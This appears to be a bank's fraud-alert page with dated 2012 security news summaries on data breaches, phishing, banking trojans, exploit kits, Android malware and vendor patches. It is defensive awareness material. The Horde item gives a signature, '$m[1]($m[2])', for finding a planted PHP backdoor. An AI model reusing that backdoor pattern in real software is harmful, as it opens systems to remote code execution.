Fraud Alert Message Center

We have been informed of a  fraudulent FDIC email scam targeting business customers.  The FDIC will not send you unsolicited email regarding your bank or your bank accounts.  If you receive an email purporting to be from the FDIC, do not open it. The email could potentially contain a virus or malware.

FDIC email abuse can be reported to us and directly to the FDIC at: alert@fdic.org.

Major Banks, Merchants Impacted by Marketing Company Hack

The list of banking institutions and retailers affected by the Epsilon e-mail breach continues to grow.

So far, Citi, Chase, U.S. Bank, Capitol One, Barclays Bank of Delaware, Verizon, Walgreens, Visa, Kroger, Marriott International, Ritz-Carlton Rewards, Brookstone, New York & Co., TiVo, HSN and L.L. Bean are among the confirmed entities to be hit by what some observers say could be one of the biggest data breaches to date.

Epsilon, an online marketing unit of Alliance Data Systems Corp., announced on April 1 that an outside intrusion had hacked into some of its customer files. Epsilon sends e-mail campaigns and offers to consumers who register for a company's website or who give their e-mail addresses while shopping. Epsilon sends more than 40 billion e-mails annually and also runs loyalty programs for Citi and Chase credit card users. Epsilon's databases house consumer information cybercriminals could use for targeted phishing, better known as spear phishing, attacks.

In a brief statement, Epsilon says it detected a breach on March 30 during which "clients' customer data were exposed by an unauthorized entry into Epsilon's e-mail system."

Subsequently, Chase and U.S. Bank both issued statements last week telling customers they should be wary of phishy e-mails.

'Biggest Breach We Have Ever Seen'
Epsilon says it does not suspect any financial information has been compromised. But it's likely just a matter of time before personal and financial information is exploited, says Neil Schwartzman, founder and chief security specialist at Montreal-based CASL Consulting.

"It is the biggest breach we have ever seen," Schwartzman says. "And to say no financial information has been stolen is, well, understating the massive breach and concern."

To date, the largest known incident is the Heartland Payment Systems data breach, which impacted an estimated 130 million payment cards.

Though still too early to confirm the depth and breadth of the Epsilon breach, Schwartzman says he expects the list of affected companies and institutions to continue to grow. He also says Epsilon should be held to the flames for not adequately protecting sensitive consumer information. "Some of the most fundamental steps of protecting consumer data were not taken here," he says.

(Security National Bank does not subscribe to any services offered by Epsilon)

2/21/12

Fake Facebook notification delivers keylogger. Fake Facebook notifications about changes in users’ account information have been hitting inboxes and delivering malware to unwary users, warn Barracuda Labs researchers. The e-mail address of the sender is spoofed to make it look like it has been sent by the social network, and the message contains only an image implying that the recipient needs to install Silverlight in order to view the content. Hovering with mouse over the image shows that the offered file is a Windows PIF file, and that is hosted on an IP address in Malaysia. The file is actually a keylogger, the Jorik Trojan. Once the keylogger is installed, it starts recording every keystroke and Web page title into a disk file, which is ultimately sent to a C&C server operated by cyber criminals.

New powerful bot spreads by e-mail. PandaLabs reported the presence of a powerful new bot called Ainslot.L. This malware is designed to log user activities, download additional malware, and take control of users’ systems. Additionally, it acts as a banker Trojan, stealing log-in information related to online banking and financial transactions. Ainslot.L also performs scans on the computer to seek and remove other bots, becoming the only bot on one’s system. “What makes this bot different is that it eliminates all competition, leaving the computer at its mercy,” explained the technical director of PandaLabs. Ainslot.L spreads via a fake e-mail purporting to come from a UK clothing company called CULT. The message informs users that they have placed an order in the amount of 200 pounds on CULT’s online store and the invoice amount will be charged to their credit card. The text includes a link to view the order which actually downloads the bot onto the computer.

Android suddenly the top target as mobile malware rises sharply, study finds. The amount of malicious code written for mobile devices, such as smart phones and tablets, jumped by 155 percent in 2011 and has grown more sophisticated, according to a new report from Juniper Networks’ Mobile Threat Center. The magnitude of the growth is surprising, said Juniper’s vice president of government affairs and critical infrastructure protection. “It’s a direct result of consumer demand.” Spyware makes up the bulk of identified mobile malware, accounting for 63 percent. The SMS trojan accounts for 36 percent of mobile malware. The amount of malware written for Android increased exponentially in 2011, going from 400 identified samples in June to more than 13,000 in December. In 2010, more than 70 percent of identified malware was written for Java ME, with another 27 percent for Symbian. BlackBerry, Android, and Windows Mobile accounted for no more than”other.” In 2011, Android was the top target, with nearly 47 percent of identified malware, and Java ME had dropped to a still respectable 41 percent. Symbian accounted for 11.5 percent.

Cybercriminals building intricate, multiuse malnets. Cybercriminals have gotten so sophisticated that they can build an intricate network infrastructure and use it repeatedly for the distribution of malware, according to a new study from Blue Coat Systems. These malware networks, or malnets, lure targets through trusted Web sites, then route them to malware through relay, exploit, and payload servers to deliver the malware payload. While malnets are becoming increasingly sophisticated, Blue Coat said these assets can be identified and the malware attacks blocked. However, the Blue Coat Systems 2012 Security Report notes that these malnets are constantly on the move, making them hard to pin down. In one case, in early February, a malware payload changed locations more than 1,500 times in a single day.

2/17/12

Java SE updates fix critical security holes. Oracle fixed 14 security holes in the Java Standard Edition (Java SE) with a critical patch update. The vulnerabilities allow attackers to use specially crafted Java WebStart applications or Web services to install malicious code on computers that run flawed versions of Java. Oracle said such flawed versions are particularly likely to exist on Windows computers because Windows users tend to have admin. privileges. The risk is smaller under operating systems such as Linux and Solaris, the company added. The holes, five of which are rated as maximum risk vulnerabilities, affect the JDK (Java Development Kit) and JRE (Java Runtime Environment) 7 Update 2, JDK and JRE 6 Update 30, JDK and JRE 5.0 Update 33, and SDK and JRE 1.4.2:35, and earlier releases of each. Versions older than JavaFX 2.0.2 are also affected. Oracle closed the holes in Java SE 7 Update 3, Java SE 6 Update 31, and JavaFX 2.0.3. The updates are available for Windows, Linux, and Solaris. Under Windows, the updates will be installed automatically via auto-update. Otherwise, the patches can be downloaded from the Java download page and installed manually

2/15/12

Horde FTP server hacked, files maliciously altered. The developers of the popular open source Web mail solution Horde identified a number of manipulated files on an FTP server. They concluded the server was breached, the files stored on it being altered to allow unauthenticated remote PHP execution. “We have immediately taken down all distribution servers to further analyze the extent of this incident, and we have worked closely with various Linux distributions to coordinate our response,” Horde officials said. After the investigation was concluded, the servers were replaced and secured, and the altered files replaced with clean variants. The analysis found three files were manipulated and modified on different occasions, and served to unsuspecting customers for about 3 months. Horde 3.3.12 was manipulated November 15, 2011, Horde Groupware 1.2.10 November 9, 2011, and Horde Groupware Webmail Edition 1.2.10 November 2, 2011. Since the incident was found February 7, users who downloaded the files during this timeframe are advised to immediately reinstall using fresh copies from Horde’s FTP server, or upgrade to more recent versions that have been released since. Horde 4 releases were not affected and neither were the company’s CVSs and Git repositories. The affected Linux distributions will provide notifications and security updates of their own. Users who are uncertain if they are exposed to cybercriminal operations can manually verify whether or not their products were altered by searching for the $m[1]($m[2]) signature in the Horde directory tree.

Google clamps down on its prepaid Google Wallet card on smartphones. Google said it temporarily disabled the provisioning of its prepaid Google Wallet cards used in some NFC-ready phones. The move follows discovery of vulnerability in Google Wallet described February 8 by security researchers at Zvelo.com. A second vulnerability for accessing Google Wallet prepaid card funds was outlined by The Smartphone Champ February 9. February 11, the vice president of Google Wallet and Payments said the step was taken as a “precaution until we issue a permanent fix soon.” The move was intended to address “unauthorized use of an existing prepaid card balance if someone recovered a lost phone without a screen lock.”

2/14/12

Valve: Hackers may have gained access to Steam transactions. Valve Software confirmed unknown intruders that gained access to the database for its Steam game distribution platform in an attack late in 2011 may have obtained a copy of a backup file of customer transactions. In a news post, Valve’s co-founder and managing director said the backup file included transactions from between 2004 and 2008, adding it contained user names and e-mail addresses, as well as encrypted billing addresses, and credit card information. However, this data did not include Steam account passwords, which were reportedly not accessed. He went on to note Valve has no evidence the credit card numbers and billing details were compromised, but again advises users to carefully watch their credit card activity and statements as a precaution. The company is still investigating the intrusion and is working with law enforcement authorities.

2/13/12

Google Wallet hacked again, no root access required this time. On February 9, security firm Zvelo revealed a hack for Google Wallet that exposed a user’s PIN. The vulnerability only affected rooted phones, according to Google. Now, however, a second hack was posted online that works on non-rooted devices and requires no special hacking skills. All someone has to do to access a user’s funds is clear the data in app settings, which will force Google Wallet to prompt them to enter a new PIN. Once the new PIN has been entered, they can add a Google Prepaid Card that is tied to the device and access any available funds.

DDoS tools flourish, give attackers many options. According to a research analyst at Arbor Networks, there is now a thriving distributed denial of service (DDoS) tool and botnet ecosystem that includes single user flooding tools, small host booters, shell booters, remote access Trojans (RATs) with flooding capabilities, simple DDoS bots, complex DDoS bots, and some commercial DDoS services. Many types of threats can be blended into any given tool to make the tool more attractive and financially lucrative for whoever is renting out the DDoS capabilities. The researcher recently counted 55 different DDoS tools, which are just a fraction of what is publicly and commercially available. Some are more dangerous than others. For example, Fg Power DDOSER is designed to flood a gaming competitor with packets, slowing connection speed or knocking them offline, although the DDoS toolkit also includes a Firefox password stealer, he said. Another simple tool, Silent-DDoSer, can launch UDP, SYN, and HTTP attacks, and also offers “triple-DES and RC4 encryption, IPv6 capabilities, and password-stealing functions,” he said. At the other end of the spectrum, there are many complex DDoS toolkits and related bots, and typically also Web-based command-and-control interfaces. These toolkits sport names such as Darkness/Optima, DeDal, Dirt Jumper, G-Bot, and Russian Armageddon. Finally, services such as Death DDoS Service and Totoro offer commercial DDoS options, meaning that rather than running the tools themselves, attackers can outsource the job.

2/10/12

Foxconn said to have been hacked by group critical of working conditions. Hackers claimed to have stolen internal data from Apple supplier Foxconn, and leaked the information online, in response to media reports of poor working conditions at the electronics manufacturer’s factories in China. The hacker group, Swagg Security, announced the attack in a Twitter message February 8, and also leaked data stolen from the Foxconn site to The Pirate Bay. It said the data included user names and passwords. Foxconn declined to comment on the attack. Two service Web sites used by Foxconn’s customers to place orders were down February 9.

Google ships Chrome 17, touts more malware alerts and page preloads. Google patched 20 vulnerabilities in the desktop edition of Chrome February 8, and added new anti-malware download warnings to version 17. The company called out a pair of new features in Chrome 17, including the expansion of anti-malware download warnings and prerendering of pages suggested by the address/search bar’s auto-complete function. One of the 20 vulnerabilities patched was rated “critical.” Eight were marked “high,” while five were labeled “medium” and six were tagged “low.”

Factory outlets’ selling stolen FacebooTwitter credentials at discount rates. Stealing credentials via Trojans has become so simple and prevalent that cybercriminals are finding themselves with a surplus: Two cybercrime gangs are now advertising bulk-rate Facebook, Twitter, and cPanel credentials in order to clean out their inventory. Researchers at Trusteer said these credential factory outlets are a way for the bad guys to cash in on other credentials thepilfered while stealing online banking credentials. It is like making money off the chafthat comes along with the valuable online banking credentials lifted by Trojans and keyloggers: “They harvest a lot of things” unrelated to the stolen online banking credentials, said the vice president of marketing for Trusteer. “This is how they monetize the [leftover] assets they harvest.” The ads were running in underground forums infiltrated by the researchers from Trusteer. Trusteer believes attackers could lure users to those sites via phishing e-mails and social networking messages.

2/9/12

Malware steals documents and uploads them to Sendspace. Security experts came across a piece of malware programmed to steal documents from the infected computer. The malicious element is designed to upload the obtained Microsoft Word and Excel files to the hosting site sendspace.com Trend Micro researchers said Sendspace was used previously to store stolen data because the service allowed crooks to “send, receive, track and share” big files, but the process was never done automatically by malware. The infection begins with an executable file called Fedex_Invoice(dot)exe, identified as TROJ_DOFOIL.GE, the file’s name hinting it may be spread with the use of a fake “FedEx failed delivery” spam campaign. Once the file is executed, it downloads and executes TSPY_SPCESEND.A, a trojan that searches the local drive for Word and Excel documents, collecting them in a password-protected archive placed in the user’s temporary folder. After the archive is created, it is uploaded to Sendspace, its download link transmitted to the malware’s command and control (C&C) server. This way the crooks do not have to store all the files on the C&C, instead they access them from the file hosting service. This discovery means information theft and exfiltration are not specific only for targeted attacks, but they are present in mass campaigns as well.

Attackers using fake Google Analytics code to redirect users to Black Hole Exploit Kit. Injecting malicious code into the HTML used on legitimate Web sites is a key part of the infection lifecycle for many attack crews, and they often disguise and obfuscate their code to make it more difficult to analyze, or so it appears, legitimate code. The latest instance of this technique has seen attackers employing code meant to look like Google Analytics snippets, but instead sends victims off to a remote site hosting the Black Hole Exploit Kit. Researchers at Websense discovered the ongoing attack recently, and found the code being used to hide the fake Google Analytics tags is heavily obfuscated, making analysis quite difficult. The malicious code, which is being injected into benign pages on legitimate sites, is designed to look just like actual Google Analytics code and to appear as though it is referring to common domains.

Blackhole toolkit served by spam ahead of tax season. Symantec researchers came across a large number of spam messages that try to trick the recipient into clicking on a link that points to the Blackhole toolkit. More than 200 unique URLs were identified in a series of e-mails that urge users to verify their accounts after some discrepancies were identified by the sender company. The phony e-mails, apparently coming from a legitimate company, read: “With intent to assure that the exact information is being sustained on our systems, as well as to improve the quality of service we can provide to you; [COMPANY NAME] has participated in the Internal Revenue Service [IRS] Name and TIN Matching Program. We have found out, that your name and/or TIN, that we have on your account is different from the information on file with the Social Security Administration. In order to verify your account, please enter the secure section.” Once the link is clicked, the user is taken to a page containing more links that point to a JavaScript file called js.js. This file serves the Blackhole toolkit looking for various vulnerabilities on the victim’s computer, the final payload being identified as Trojan.Zbot. The domains that contain the malicious JavaScript file are not only newly registered domains, but also legitimate domains that were hijacked by the cybercriminals that launched the campaign. Users are advised not to click on links that come with a suspicious looking e-mail, but also to avoid opening attachments, especially if they are represented by exe, zip, or pdf files.

Adobe sets IE as next target in Flash security work. Adobe plans to tackle Microsoft’s Internet Explorer (IE) in its ongoing work to “sandbox” its popular Flash Player within browsers, Adobe’s head of security said February 7. On February 6, Adobe released a beta version of a sandboxed Flash Player plug-in for Mozilla’s Firefox on Windows Vista and Windows 7 as a follow-up to a similar initiative in 2010 for Google’s Chrome. Next on the list is IE. “IE has a big chunk of the user base,” said Adobe’s senior director of security, products, and services. “We want to do what protects the most users the fastest.” According to Web metrics company Net Applications, IE accounted for 53 percent of all browsers used last in January worldwide, or more than double Firefox’s 21 percent, and almost triple Chrome’s 19 percent. Adobe’s head of security declined to set a timetable for putting Flash within a sandbox inside IE.

2/7/12

Hackers may be able to ‘outwit’ online banking security devices. An investigation by BBC Click underlines possible shortcomings in the extra security provided by banking authentication devices such as PINSentry from Barclays and SecureKey from HSBC. Hackers could set up a fake banking Web site and prompt users attempting to log into their account for both their online log-in credential and, for example, a PINSentry code. This information would allow cybercrooks to log onto the genuine banking Web site, posing as a customer, before authorizing fraudulent transfers or other payments. This variant of a classic man-in-the-middle-attack is known in security circles as a man-in-the-browser attack. Isolated incidents of this type of fraud have cropped up over recent years. While the attack is not new, it is doubtful that many consumers are aware of it.

Facebook malware scam takes hold. A large number of Facebook users were sharing a link to a malware-laden fake CNN news page reporting the United States attacked Iran and Saudi Arabia, security firm Sophos said February 3. If users who follow the link click to play what purports to be video coverage of the attack, they are prompted to update their Adobe Flash player with a pop-up window that looks like the real thing. Those who accept the prompt unwittingly install malware. Within 3 hours of the scam’s appearance, more than 60,000 users followed a link to the spoofed CNN page, according to a Sophos senior security adviser. Facebook removed that link, but others were still being shared. In a statement, Facebook said it was “in the process of cleaning up this spam now, and remediating any affected users.”

2/6/12

Symantec warns of Android Trojans that mutate with every download. Researchers from Symantec identified a new premium-rate SMS Android Trojan that modifies its code every time it gets downloaded to bypass antivirus detection. This technique is known as server-side polymorphism and already existed in the world of desktop malware for many years, but mobile malware creators have only now begun to adopt it. A special mechanism that runs on the distribution server modifies certain parts of the Trojan to ensure every malicious app that gets downloaded is unique. This is different from local polymorphism where the malware modifies its own code every time it gets executed. Symantec identified multiple variants of this Trojan horse, which it detects as Android. Opfake, and all of them are distributed from Russian Web sites. However, the malware contains instructions to automatically send SMS messages to premium-rate numbers from many European and former Soviet Union countries. In some cases, especially when security products rely heavily on static signatures, detecting malware threats that make use of server-side polymorphism can be difficult.

HP recalls fax machines due to fire and burn hazards. The U.S. Consumer Product Safety Commission, in cooperation with Hewlett-Packard (HP) announced a voluntary recall February 2 of about 928,000 HP fax 1040 and 1050 machines. The importer was Hewlett-Packard Co., of Palo Alto, California. The machines were manufactured in China. The fax machines can overheat due to an internal electrical component failure, posing fire and burn hazards. HP is aware of seven reports of machines overheating and catching fire, resulting in property damage, including one instance of significant property damage and one instance of a minor burn injury to a consumer’s finger. Six incidents were reported in the United States. The machines were sold at electronics, computer, and camera stores nationwide and online at www.shopping.hp.com and other Web sites from November 2004 through December 2011. Some of the recalled fax machines were replacement units for a previous recall involving HP fax model 1010 in June 2008.

Google beefs up Android Market security. Google unveiled a new security service for the Android Market February 2 that aims to auto-scan uploaded Android applications to detect potentially malicious apps more quickly, ideally before users download them. Codenamed Bouncer, the new service searches for threats without requiring any pre-approval process, continuing to keep the Market as “open” as it has always been. The new security service has already             been working for the past few months. After finding an app that violates the rules — be it malware or spyware — the Android team takes the application down and bans the developer account from uploading any more apps. Further, Google continues to check new Android developer account sign-ups, so repeat offenders will not continue to upload malicious apps under different user names.    

Half of Fortune 500 firms infected with DNS Changer. Half of all Fortune 500 companies and major U.S. government agencies own computers infected with the “DNS Changer” malware that redirects users to fake Web sites and puts organizations at risk of information theft, security company Internet Identity (IID) said February 2. DNS Changer, which at its peak was installed on more than 4 million Windows PCs and Macs worldwide — a quarter of them in the United States alone — was the target of a major takedown organized by the U.S. Department of Justice in November 2011. The takedown and accompanying arrests of six Estonian men, was dubbed “Operation Ghost Click.” As part of the operation, the FBI seized control of more than 100 command-and-control servers hosted at U.S. data centers. According to IID, half of the firms in the Fortune 500, and a similar percentage of major U.S. government agencies, harbor one or more computers infected with DNS Changer. IID used telemetry from its monitoring of client networks, as well as third-party data, to claim at least 250 of the Fortune 500 companies and 27 out of 55 major government agencies had at least one computer or router infected with DNS Changer as of early 2012.

2/3/12

Official EA forum hacked and defaced, data is secure. Unnamed hackers managed to breach the security measure implemented by Electronic Arts (EA) on its official forum (forum.ea.com) after successfully exploiting a vulnerability they identified in the software that runs the site (possibly a Java app). Voice Of Grey Hat said the company’s marketing manager came forward with a statement to reassure users the security hole was patched up and their personal information was not exposed at any time. “As some of you noticed, the homepage of the forums was defaced by a hacker yesterday using a very new exploit for the software which runs the forums. This was noticed quickly and we took the action to take the forums offline while we investigated the details. This work is now complete, and the vulnerability we believe was used has now been fixed,” he said. “There is no evidence that any personal data was compromised, and as passwords aren’t stored in a recoverable manor, we are confident they remain secure.

Key Internet operator VeriSign hit by hackers. VeriSign Inc., the company in charge of delivering people safely to more than half the world’s Web sites, was hacked repeatedly by outsiders who accessed undisclosed information from the leading Internet infrastructure company. The previously unreported breaches occurred in 2010 at the company, which is ultimately responsible for the integrity of Web addresses ending in .com, .net, and .gov. VeriSign said its executives “do not believe these attacks breached the servers that support our Domain Name System network,” which ensures people land at the right numeric Internet Protocol address, but it did not rule anything out. VeriSign’s domain-name system processes as many as 50 billion queries daily. Pilfered information from it could let hackers direct people to faked sites and intercept e-mail from federal employees or corporate executives, though classified government data moves through more secure channels. The VeriSign attacks were revealed in a quarterly U.S. Securities and Exchange Commission (SEC) filing in October 2011 that followed new guidelines on reporting security breaches to investors. Even if the name system is safe, VeriSign offers a number of other services where security is paramount. The company defends customers’ Web sites from attacks and manages their traffic, and it researches international cybercrime groups. VeriSign would possess sensitive information on customers, and its registry services that dispense Web site addresses would also be a natural target. The SEC filing said security staff responded to the attack soon after it happened, but failed to alert top management until September 2011.

Counterclank stays on Android Market, Symantec gives more explanations. After mobile security firm Lookout argued Android.Counterclank is not a piece of malware as Symantec labeled it, the latter came forward with new arguments to back their initial decision to tell users of potential dangers. Symantec’s update reveals even Google decided the apps met their terms and service conditions and that removal from the Android Market was unnecessary. Even the developers accused of serving malicious apps came forward to deny their products represent malware. “WE ARE NOT MALWARE!! Symantec, the company that wrongly labeled this app as malware the other day, have contacted us and are in the process of un-doing the mistake they did and whitelabling our product,” the developers wrote on Android Market. On the other hand, Symantec argued they need to keep users informed on behaviors of some applications that may pose a threat to regular users. “The situation we find ourselves in is similar to when Adware, Spyware, and Potentially Unwanted Applications first made appearances on Windows. Many security vendors did not initially detect these applications, but eventually, and with the universal approval of computer users, security companies chose to notify users of these types of applications,” they said. Now, Symantec brings further details to support their initial arguments around the dangers presented by the applications in question. They revealed that Tonclank and Counterclank apps come from the same vendor, a company that distributes a software development kit (SDK) to third parties with the purpose of helping them monetize their applications, mainly through search.

2/2/12

Malware redirects bank phone calls to attackers. Trusteer has discovered a concerning development in new configurations of Ice IX, a modified variant of the ZeuS financial malware platform, that are targeting online banking customers in the United Kingdom (UK) and United States. “In addition to stealing bank account data, these Ice IX configurations are capturing information on telephone accounts belonging to the victims ... allow[ing] attackers to divert calls from the bank intended for their customer to attacker controlled phone numbers,” the chief technology officer (CTO) of Trusteer said. He believes “the fraudsters are executing fraudulent transactions using the stolen credentials and redirecting the bank’s post-transaction verification phone calls to professional criminal caller services that approve the transactions.” In one captured attack, at login the malware steals the victim’s user ID and password, memorable information/secret question answer, date of birth, and account balance. Next, the victim is asked to update phone numbers and select the name of their service provider from a drop-down list. To enable the attacker to modify phone service settings, the victim is then asked by the malware to submit telephone account number. The fraudsters justify this request by stating this data is required as a part of verification process caused by “a malfunction of the bank’s anti-fraud system with its landline phone service provider.”

Hacker extracts RFID credit card details. The widespread use, especially in U.S. credit cards, of radio frequency identification (RFID) chips which can be read through clothing or wallets for contactless payments can lead to cards being read without the owner’s knowledge or permission, H Security reported February 1. Forbes reported January 30 that a hacker at the Shmoocon security conference in Washington D.C. demonstrated the ability to read data on RFID chipped credit cards and make a payment that had not been authorized by the card owner. With about 100 million RFID cards issued, this could now be done without card owners handing over their cards. No security measures such as card reader authentication are in place. However, the RFID data does not include the three-digit CVV number printed on the back of the card that is usually required when making an online transaction. Instead, the chip issues a one-time CVV that is only valid for one transaction. Using this CVV repeatedly will cause the card to be blocked. In the United States, Visa markets RFID credit cards as payWave, and in the United Kingdom (UK) as Contactless by Visa. Mastercard markets their RFID credit cards as Paypass in the United States and UK.

Trymedia breach exposes credit card numbers of 12,000 digital game customers. Trymedia’s ActiveStore Web-based storefront application, which processes digital game purchases made by customers on its partners’ Web sites, was recently breached, exposing credit card numbers and other personal information of more than 12,000 customers, Infosecurity reported January 31. Trymedia told the New Hampshire Attorney General’s Office it believes hackers were able to obtain credit card numbers, expiration dates, security codes, and postal and e-mail addresses to optional users accounts for transactions between November 4 and December 2. Trymedia said it would notify the 12,456 customers affected by postal mail about the potential breach and offer to provide a 12-month subscription to a credit-monitoring and identity-theft protection product.

2/1/12

Symantec declares pcAnywhere safe to use. Symantec announced its pcAnywhere software is now safe to use, with free upgrades offered to users, SC Magazine UK reported January 31. According to Reuters, the company determined the current version of pcAnywhere is safe, provided it has been updated with a security patch released January 23. A Symantec spokesman said it is offering free upgrades to pcAnywhere 12.5 to all customers, even those using old editions. He also said that while Symantec is advising all users to upgrade, they can safely continue using versions 12.0 and 12.1 if they download a second software patch released January 27. Symantec advised users the week of January 23 to disable pcAnywhere as they were at increased risk of being hacked after the blueprints to the software were stolen. However, according to the chief security officer at Rapid7, more than 140,000 computers appear to remain configured to pcAnywhere to allow direct connections from the Internet, especially point-of-sale machines, putting them at risk.

Virus-slingers abuse WordPress vulns, dose punters with exploit. Malware-spreaders are hacking into vulnerable WordPress-powered sites to drive traffic towards pages loaded with exploits, The Register reported January 31. Hundreds of Web sites based on WordPress 3.2.1 have been compromised so that surfers directed to the Wordpress-built sites via e-mail links are exposed to the Phoenix exploit kit, M86 Security warned. To lure users to compromised pages, the attacker has spammed out thousands of malicious e-mails querying an unfamiliar bill and asking recipients to click on a link. The link points to a page on compromised WordPress sites (the sites appear legitimate to spam filters) that include a hidden iFrame, which loads the Phoenix exploit kit from a Russian-hosted server. Arriving at the page puts surfers in the firing line of a page that attempts exploit multiple vulnerabilities in Microsoft Internet Explorer, Adobe PDF, Flash, and Oracle Java. The attack is ultimately designed to distribute an information-harvesting Trojan, dubbed Cridex-B.

Facebook Valentine’s Day Theme Leads to Trojan. Trend Micro researchers came across a Valentine’s Day-themed Facebook scam that attempts to dupe victims into downloading a malicious Trojan that later place itself in the browser with the purpose of helping crooks make money, Softpedia reported January 31. Facebook customers who fall for the phony advertisement and click it are taken to a Web site that displays a large Install button. Once clicked, the page prompts the user to download a file called FacebookChrome.crx, identified by the security firm as Troj.Fookbace.A. Upon execution, the Trojan executes a script that is capable of displaying ads from other sites, as well as installing itself on the browser as an extension named Facebook Improvement. After it is successfully installed, the malicious extension monitors Web activities, redirects sessions to survey pages that request sensitive data, performs like-jacking attacks, and posts ill-intended messages on behalf of the victim. Experts believe these attacks are specially designed to target Chrome users, but note they also work with Mozilla Firefox. Facebook members that utilize Internet Explorer are directly taken to the survey site because the extension does not work that browser.

Cidrex Trojan breaks CAPTCHA to create Yahoo! email account. Security experts found a component of the ZeuS-like Cidrex trojan was able to break the security tests to create e-mail accounts, Softpedia reported January 30. Websense researchers came across a variant of Cidrex, a banking Trojan, that not only infects computers with the purpose of stealing sensitive data from their owners, but it also manages to create Yahoo! e-mail accounts to spam others. This certain version of the malware spreads via e-mails containing a shortened link that points to the Blackhole exploit kit. If the exploit is successful, the trojan is downloaded to the infected machine. Normally, if CAPTCHAs were strong, automated tools would have a hard time creating accounts, but experts showed that with just six attempts, this malevolent element breaks the security test and creates a Yahoo e-mail account withoutmuch difficulty. This is done by harvesting the image that represents the CAPTCHA and sending it with an HTTP POST request to a CAPTCHA-breaking server that outputs a response in JSON format.

1/31/12

Technology firms create DMarc to fight phishing. A crackdown on “phishing” scams has been announced by 15 of the top technology companies. E-mail providers such as Google and Microsoft will work with companies like Paypal and the Bank of America to improve authentication. The Domain-based Message Authentication, Reporting and Conformance (DMarc) coalition has released plans to produce a “feedback loop” between e-mail receivers and senders. The initiative is the first significant attempt to bring together e-mail and service providers along with key security organizations. DMarc said this industry-wide involvement — which covers the receivers, senders, and intermediaries of e-mail use — will mean e-mail providers will for the first time be able to reliably filter out unwanted e-mails, rather than use “complex and imperfect measurements” to determine threats.

New drive-by spam infects those who open email — no attachment needed. Attackers have developed a new way to infect a user’s PC through e-mail. According to researchers at eleven, a German security firm, the new drive-by spam automatically downloads malware when an e-mail is opened in the e-mail client. The user does not have to click on a link or open an attachment — just opening the e-mail is enough. The current wave of drive-by spam contains the subject “Banking security update” and has a sender address with the domain fdic.com. If the e-mail client allows HTML e-mails to be displayed, the HTML code is immediately activated.

Drive-by-download attack exploits critical vulnerability in Windows Media Player. Security researchers from antivirus vendor Trend Micro have come across a Web-based attack that exploits a known vulnerability in Windows Media Player, a threat response engineer said in a blog post January 26. The security flaw can be exploited by tricking the victim into opening a specially crafted MIDI (Musical Instrument Digital Interface) file in Windows Media Player. Microsoft released a security fix for it January 10, as part of its monthly patch cycle. If successful, the exploit downloads and executes a computer Trojan on the targeted system, which Trend Micro detects as TROJ_DLOAD.QYUA. “[So] far we’ve been seeing some serious payload, including rootkit capabilities,” the Trend Micro engineer said. The attack is not widespread at the moment, but it is possible other attackers will start exploiting the same vulnerability in the near future, a senior antivirus researcher said.

Massive Android malware op may have infected 5 million users. The largest-ever Android malware campaign may have duped as many as 5 million users into downloading infected apps from Google’s Android Market, Symantec said January 27. Dubbed “Android.Counterclank” by Symantec, the malware was packaged in 13 different apps from three different publishers, with titles ranging from “Sexy Girls Puzzle” to “Counter Strike Ground Force.” “They don’t appear to be real publishers,” a director with Symantec’s security response team said in an interview. “These aren’t rebundled apps, as we’ve seen so many times before.” Symantec estimated the impact by combining the download totals of the 13 apps, arriving at a figure between 1 million on the low end and 5 million on the high. When installed on an Android smartphone, Android. Counterclank collects a wide range of information, including copies of the bookmarks and the handset maker. Italso modifies the browser’s home page.

01/30/12

Facebook scammers leverage the Amazon Cloud. Recently, spammers began using Amazon’s cloud services for hosting fake Facebook pages leading to surveys because it is cheap and because is less likely Facebook will block links from an Amazon domain. Users are usually reeled in with offers to see a funny/amazing/shocking video, and click on the offered URL (often a shortened one). In a recently spotted scam, users who click the link are taken to a fake Facebook page where those who use Chrome and Firefox are asked to install a fake YouTube plug-in to view the video. The offered plugin is not what it claims to be. “Upon installing the plugin, a redirector URL is generated by randomly selecting from the usernames, mo1tor to mo15tor, in the Amazon web service,” explain F-Secure researchers. “Then, the link generated is shortened through bitly.com via the use of any of the 5 hardcoded userID and API key-pairs. These key-pars gives a spammer the ability to auto-generate bit.ly URLs for the Amazon web service link. This ultimately leads to a redirection to the fake Facebook page.” These users are, therefore, responsible for propagating the scam further by unknowingly posting the scam message on their Facebook profiles, and are not asked to fill out surveys. Users who use other browsers are spared from inadvertently spamming their friends but are redirected to surveys provided by affiliate marketers.

Unwanted apps on Android smartphones. Third-party Android Markets have always been the favorite means of malicious app dissemination, especially in regions where users do not have access to the official repository. This is also the case with the latest campaign laid out by cyber criminals to lure users into installing well-known applications on the genuine Android Market, but which have been tampered with to launch additional services along with the original app. Simply put, the original Android application downloaded from a third-party contains the legitimate app as well as a trojanized service (usually called “GoogleServicesFrameworkService”), which is launched with the host application. Identified by Bitdefender as Android.Trojan.FakeUpdates.A, this piece of malware connects to a command and control server and fetches a list of links to different Android application packages (APKs). After that, the malware downloads each APK from the list and then displays a notification in the status bar area, reading “In order to have access to the latest updates, click Install).” This approach confuses the user, as they do not know where the message came from. This trojan requires an extensive array of privileges upon installing, to make sure it can take full control over the smartphone whenever necessary. Depending on the APKs to be downloaded and installed, the application may require up to 10 privileges prior to installation. Most of the users will accept it without any second thoughts, since they believe what is to be installed is an update to one of the applications they already installed. Android applications posted on third-party Android Markets are not new; however, what is particularly important is the attackers’ modus operandi: they publish a legitimate application on the respective Market, let it live for a several days to get the positive ratings and gain users’ trust, and then change the APK with a trojanized one in order to fulfill their malicious goals. Most of the repackaged applications analyzed have low detection rates, which poses a danger even to smartphone users who run a mobile security solution. Android.Trojan.FakeUpdates.A poses a threat to the smartphone user as it can download and install anything, from trial versions of software in pay-per-install campaigns to spyware and other Trojans.

